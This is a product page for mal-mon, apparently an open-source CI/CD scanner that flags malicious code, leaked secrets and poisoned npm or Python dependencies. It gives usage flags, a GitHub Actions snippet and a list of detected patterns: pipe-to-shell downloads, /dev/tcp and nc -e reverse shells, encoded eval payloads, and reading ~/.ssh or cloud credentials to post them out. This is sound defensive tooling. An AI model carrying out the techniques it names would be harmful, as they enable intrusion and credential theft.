An agent-agnostic malware & supply-chain scanner for CI/CD — pure bash + python3 stdlib, zero install. It catches malicious code, leaked secrets and poisoned dependencies before they merge, then gates the build through its exit code. Built in the open by OptinAmpOut.
A single curl … | bash in a postinstall hook, a base64 blob that decodes to a reverse shell, an AWS key committed by accident — supply-chain and malware incidents almost always slip in through code nobody reviewed line-by-line. mal-mon runs that review automatically, on every push, and fails the build when it finds something. The core needs nothing but bash and python3, so it runs anywhere — CI runner, pre-commit hook, or an agent’s sandbox.
scan.sh always runs the dependency-free engine, layers in any richer scanners it finds on the runner, then merges, de-duplicates and ranks — gating the build through its exit code.
heuristics.py runs always — pattern rules, entropy analysis and base64 payload decoding, no install required.
If gitleaks, semgrep, trivy, pip-audit or npm are present, they’re merged in — otherwise gracefully skipped.
Findings are de-duplicated and ranked LOW…CRITICAL, then rendered as text, JSON or SARIF.
0 clean · 1 findings at/above threshold · 2 error. The pipeline stops on what matters.
From obvious reverse shells to high-entropy secrets and poisoned install hooks.
Pipe-to-shell (curl … | bash), /dev/tcp reverse shells, nc -e, crypto miners.
eval(base64…), Function(atob(…)), hex/charCode blobs, base64 that decodes to executable content.
pickle.loads, marshal.loads, yaml.load without SafeLoader, node vm.
Private keys, AWS / GitHub / Slack / Google / Stripe tokens, JWTs, hardcoded creds and high-entropy strings.
npm pre/postinstall hooks running network/eval; dependency CVEs via trivy / pip-audit / npm-audit.
Reading ~/.ssh, cloud creds, or env vars posted to the network.
scan.sh + heuristics.py are all you need. Run it in CI, as a pre-commit hook, or point an agent at it as the /malware-monitor skill.
# Full scan, fail the build on HIGH or above ./scan.sh --path . --fail-on HIGH # Pre-commit: only scan staged files ./scan.sh --staged --fail-on MEDIUM # Machine-readable for GitHub code-scanning ./scan.sh --path . --format sarif --output scan.sarif
- name: malware-monitor run: | bash .ci/malware-monitor/scan.sh --path . --fail-on HIGH \ --format sarif --output results.sarif - uses: github/codeql-action/upload-sarif@v3 if: always() with: { sarif_file: results.sarif }
| Flag | Default | Meaning |
|---|---|---|
--path DIR | . | Directory or file to scan. |
--staged | off | Scan only git-staged files (pre-commit). |
--fail-on SEV | HIGH | Min severity that fails the build. |
--format | text | text · json · sarif. |
--secrets-only | off | Run only secret rules — a fast gate. |
--no-optional | off | Skip external scanners; built-in engine only. |
mal-mon detects and reports — it never executes flagged payloads and never “fixes” or augments malicious code. Scan code you own or are authorized to audit. It’s part of the secure-operations toolchain we run on our own pipelines and our clients’.
We wire malware, secret and supply-chain scanning into CI/CD — and harden the rest of your build path while we’re there. Tell us what you’re shipping.
Book a build call →